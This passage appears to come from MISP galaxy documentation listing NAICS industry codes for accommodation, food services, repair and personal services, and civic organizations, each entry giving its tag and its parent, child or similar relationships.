  • parent-of: misp-galaxy:naics="721110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721199" with estimative-language:likelihood-probability="likely"

72111

Hotels (except Casino Hotels) and Motels

The tag is: misp-galaxy:naics="72111"

72111 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721110" with estimative-language:likelihood-probability="likely"

721110

Hotels (except Casino Hotels) and Motels

The tag is: misp-galaxy:naics="721110"

721110 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72111" with estimative-language:likelihood-probability="likely"

72112

Casino Hotels

The tag is: misp-galaxy:naics="72112"

72112 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721120" with estimative-language:likelihood-probability="likely"

721120

Casino Hotels

The tag is: misp-galaxy:naics="721120"

721120 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72112" with estimative-language:likelihood-probability="likely"

72119

Other Traveler Accommodation

The tag is: misp-galaxy:naics="72119"

72119 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

721191

Bed-and-Breakfast Inns

The tag is: misp-galaxy:naics="721191"

721191 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

721199

All Other Traveler Accommodation

The tag is: misp-galaxy:naics="721199"

721199 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

7212

RV (Recreational Vehicle) Parks and Recreational Camps

The tag is: misp-galaxy:naics="7212"

7212 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721214" with estimative-language:likelihood-probability="likely"

72121

RV (Recreational Vehicle) Parks and Recreational Camps

The tag is: misp-galaxy:naics="72121"

72121 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

721211

RV (Recreational Vehicle) Parks and Campgrounds

The tag is: misp-galaxy:naics="721211"

721211 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

721214

Recreational and Vacation Camps (except Campgrounds)

The tag is: misp-galaxy:naics="721214"

721214 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

7213

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="7213"

7213 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721310" with estimative-language:likelihood-probability="likely"

72131

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="72131"

72131 has relationships with:

  • child-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721310" with estimative-language:likelihood-probability="likely"

721310

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="721310"

721310 has relationships with:

  • child-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72131" with estimative-language:likelihood-probability="likely"

722

Food Services and Drinking Places

The tag is: misp-galaxy:naics="722"

722 has relationships with:

  • child-of: misp-galaxy:naics="72" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

7223

Special Food Services

The tag is: misp-galaxy:naics="7223"

7223 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722330" with estimative-language:likelihood-probability="likely"

72231

Food Service Contractors

The tag is: misp-galaxy:naics="72231"

72231 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722310" with estimative-language:likelihood-probability="likely"

722310

Food Service Contractors

The tag is: misp-galaxy:naics="722310"

722310 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72231" with estimative-language:likelihood-probability="likely"

72232

Caterers

The tag is: misp-galaxy:naics="72232"

72232 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722320" with estimative-language:likelihood-probability="likely"

722320

Caterers

The tag is: misp-galaxy:naics="722320"

722320 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72232" with estimative-language:likelihood-probability="likely"

72233

Mobile Food Services

The tag is: misp-galaxy:naics="72233"

72233 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722330" with estimative-language:likelihood-probability="likely"

722330

Mobile Food Services

The tag is: misp-galaxy:naics="722330"

722330 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72233" with estimative-language:likelihood-probability="likely"

7224

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="7224"

7224 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722410" with estimative-language:likelihood-probability="likely"

72241

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="72241"

72241 has relationships with:

  • child-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722410" with estimative-language:likelihood-probability="likely"

722410

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="722410"

722410 has relationships with:

  • child-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72241" with estimative-language:likelihood-probability="likely"

7225

Restaurants and Other Eating Places

The tag is: misp-galaxy:naics="7225"

7225 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722515" with estimative-language:likelihood-probability="likely"

72251

Restaurants and Other Eating Places

The tag is: misp-galaxy:naics="72251"

72251 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722511

Full-Service Restaurants

The tag is: misp-galaxy:naics="722511"

722511 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722513

Limited-Service Restaurants

The tag is: misp-galaxy:naics="722513"

722513 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722514

Cafeterias, Grill Buffets, and Buffets

The tag is: misp-galaxy:naics="722514"

722514 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722515

Snack and Nonalcoholic Beverage Bars

The tag is: misp-galaxy:naics="722515"

722515 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

81

Other Services (except Public Administration)

The tag is: misp-galaxy:naics="81"

81 has relationships with:

  • parent-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="814" with estimative-language:likelihood-probability="likely"

811

Repair and Maintenance

The tag is: misp-galaxy:naics="811"

811 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

8111

Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="8111"

8111 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811198" with estimative-language:likelihood-probability="likely"

81111

Automotive Mechanical and Electrical Repair and Maintenance

The tag is: misp-galaxy:naics="81111"

81111 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811111

General Automotive Repair

The tag is: misp-galaxy:naics="811111"

811111 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811114

Specialized Automotive Repair

The tag is: misp-galaxy:naics="811114"

811114 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

81112

Automotive Body, Paint, Interior, and Glass Repair

The tag is: misp-galaxy:naics="81112"

81112 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811121

Automotive Body, Paint, and Interior Repair and Maintenance

The tag is: misp-galaxy:naics="811121"

811121 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811122

Automotive Glass Replacement Shops

The tag is: misp-galaxy:naics="811122"

811122 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

81119

Other Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="81119"

81119 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811191

Automotive Oil Change and Lubrication Shops

The tag is: misp-galaxy:naics="811191"

811191 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811192

Car Washes

The tag is: misp-galaxy:naics="811192"

811192 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811198

All Other Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="811198"

811198 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

8112

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="8112"

8112 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811210" with estimative-language:likelihood-probability="likely"

81121

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="81121"

81121 has relationships with:

  • child-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811210" with estimative-language:likelihood-probability="likely"

811210

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="811210"

811210 has relationships with:

  • child-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81121" with estimative-language:likelihood-probability="likely"

8113

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="8113"

8113 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811310" with estimative-language:likelihood-probability="likely"

81131

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="81131"

81131 has relationships with:

  • child-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811310" with estimative-language:likelihood-probability="likely"

811310

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="811310"

811310 has relationships with:

  • child-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81131" with estimative-language:likelihood-probability="likely"

8114

Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="8114"

8114 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811490" with estimative-language:likelihood-probability="likely"

81141

Home and Garden Equipment and Appliance Repair and Maintenance

The tag is: misp-galaxy:naics="81141"

81141 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

811411

Home and Garden Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="811411"

811411 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

811412

Appliance Repair and Maintenance

The tag is: misp-galaxy:naics="811412"

811412 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

81142

Reupholstery and Furniture Repair

The tag is: misp-galaxy:naics="81142"

81142 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811420" with estimative-language:likelihood-probability="likely"

811420

Reupholstery and Furniture Repair

The tag is: misp-galaxy:naics="811420"

811420 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81142" with estimative-language:likelihood-probability="likely"

81143

Footwear and Leather Goods Repair

The tag is: misp-galaxy:naics="81143"

81143 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811430" with estimative-language:likelihood-probability="likely"

811430

Footwear and Leather Goods Repair

The tag is: misp-galaxy:naics="811430"

811430 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81143" with estimative-language:likelihood-probability="likely"

81149

Other Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="81149"

81149 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811490" with estimative-language:likelihood-probability="likely"

811490

Other Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="811490"

811490 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81149" with estimative-language:likelihood-probability="likely"

812

Personal and Laundry Services

The tag is: misp-galaxy:naics="812"

812 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

8121

Personal Care Services

The tag is: misp-galaxy:naics="8121"

8121 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812199" with estimative-language:likelihood-probability="likely"

81211

Hair, Nail, and Skin Care Services

The tag is: misp-galaxy:naics="81211"

81211 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812111

Barber Shops

The tag is: misp-galaxy:naics="812111"

812111 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812112

Beauty Salons

The tag is: misp-galaxy:naics="812112"

812112 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812113

Nail Salons

The tag is: misp-galaxy:naics="812113"

812113 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

81219

Other Personal Care Services

The tag is: misp-galaxy:naics="81219"

81219 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812191

Diet and Weight Reducing Centers

The tag is: misp-galaxy:naics="812191"

812191 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

812199

Other Personal Care Services

The tag is: misp-galaxy:naics="812199"

812199 has relationships with:

  • child-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

8122

Death Care Services

The tag is: misp-galaxy:naics="8122"

8122 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812220" with estimative-language:likelihood-probability="likely"

81221

Funeral Homes and Funeral Services

The tag is: misp-galaxy:naics="81221"

81221 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812210" with estimative-language:likelihood-probability="likely"

812210

Funeral Homes and Funeral Services

The tag is: misp-galaxy:naics="812210"

812210 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81221" with estimative-language:likelihood-probability="likely"

81222

Cemeteries and Crematories

The tag is: misp-galaxy:naics="81222"

81222 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812220" with estimative-language:likelihood-probability="likely"

812220

Cemeteries and Crematories

The tag is: misp-galaxy:naics="812220"

812220 has relationships with:

  • child-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81222" with estimative-language:likelihood-probability="likely"

8123

Drycleaning and Laundry Services

The tag is: misp-galaxy:naics="8123"

8123 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812332" with estimative-language:likelihood-probability="likely"

81231

Coin-Operated Laundries and Drycleaners

The tag is: misp-galaxy:naics="81231"

81231 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812310" with estimative-language:likelihood-probability="likely"

812310

Coin-Operated Laundries and Drycleaners

The tag is: misp-galaxy:naics="812310"

812310 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81231" with estimative-language:likelihood-probability="likely"

81232

Drycleaning and Laundry Services (except Coin-Operated)

The tag is: misp-galaxy:naics="81232"

81232 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812320" with estimative-language:likelihood-probability="likely"

812320

Drycleaning and Laundry Services (except Coin-Operated)

The tag is: misp-galaxy:naics="812320"

812320 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81232" with estimative-language:likelihood-probability="likely"

81233

Linen and Uniform Supply

The tag is: misp-galaxy:naics="81233"

81233 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

812331

Linen Supply

The tag is: misp-galaxy:naics="812331"

812331 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

812332

Industrial Launderers

The tag is: misp-galaxy:naics="812332"

812332 has relationships with:

  • child-of: misp-galaxy:naics="8123" with estimative-language:likelihood-probability="likely"

8129

Other Personal Services

The tag is: misp-galaxy:naics="8129"

8129 has relationships with:

  • child-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81293" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812990" with estimative-language:likelihood-probability="likely"

81291

Pet Care (except Veterinary) Services

The tag is: misp-galaxy:naics="81291"

81291 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812910" with estimative-language:likelihood-probability="likely"

812910

Pet Care (except Veterinary) Services

The tag is: misp-galaxy:naics="812910"

812910 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81291" with estimative-language:likelihood-probability="likely"

81292

Photofinishing

The tag is: misp-galaxy:naics="81292"

81292 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

812921

Photofinishing Laboratories (except One-Hour)

The tag is: misp-galaxy:naics="812921"

812921 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

812922

One-Hour Photofinishing

The tag is: misp-galaxy:naics="812922"

812922 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

81293

Parking Lots and Garages

The tag is: misp-galaxy:naics="81293"

81293 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812930" with estimative-language:likelihood-probability="likely"

812930

Parking Lots and Garages

The tag is: misp-galaxy:naics="812930"

812930 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81293" with estimative-language:likelihood-probability="likely"

81299

All Other Personal Services

The tag is: misp-galaxy:naics="81299"

81299 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="812990" with estimative-language:likelihood-probability="likely"

812990

All Other Personal Services

The tag is: misp-galaxy:naics="812990"

812990 has relationships with:

  • child-of: misp-galaxy:naics="8129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81299" with estimative-language:likelihood-probability="likely"

813

Religious, Grantmaking, Civic, Professional, and Similar Organizations

The tag is: misp-galaxy:naics="813"

813 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

8131

Religious Organizations

The tag is: misp-galaxy:naics="8131"

8131 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813110" with estimative-language:likelihood-probability="likely"

81311

Religious Organizations

The tag is: misp-galaxy:naics="81311"

81311 has relationships with:

  • child-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813110" with estimative-language:likelihood-probability="likely"

813110

Religious Organizations

The tag is: misp-galaxy:naics="813110"

813110 has relationships with:

  • child-of: misp-galaxy:naics="8131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81311" with estimative-language:likelihood-probability="likely"

8132

Grantmaking and Giving Services

The tag is: misp-galaxy:naics="8132"

8132 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813219" with estimative-language:likelihood-probability="likely"

81321

Grantmaking and Giving Services

The tag is: misp-galaxy:naics="81321"

81321 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813211

Grantmaking Foundations

The tag is: misp-galaxy:naics="813211"

813211 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813212

Voluntary Health Organizations

The tag is: misp-galaxy:naics="813212"

813212 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

813219

Other Grantmaking and Giving Services

The tag is: misp-galaxy:naics="813219"

813219 has relationships with:

  • child-of: misp-galaxy:naics="8132" with estimative-language:likelihood-probability="likely"

8133

Social Advocacy Organizations

The tag is: misp-galaxy:naics="8133"

8133 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813319" with estimative-language:likelihood-probability="likely"

81331

Social Advocacy Organizations

The tag is: misp-galaxy:naics="81331"

81331 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813311

Human Rights Organizations

The tag is: misp-galaxy:naics="813311"

813311 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813312

Environment, Conservation and Wildlife Organizations

The tag is: misp-galaxy:naics="813312"

813312 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

813319

Other Social Advocacy Organizations

The tag is: misp-galaxy:naics="813319"

813319 has relationships with:

  • child-of: misp-galaxy:naics="8133" with estimative-language:likelihood-probability="likely"

8134

Civic and Social Organizations

The tag is: misp-galaxy:naics="8134"

8134 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81341" with estimative-language:likelihood-probability="likely"

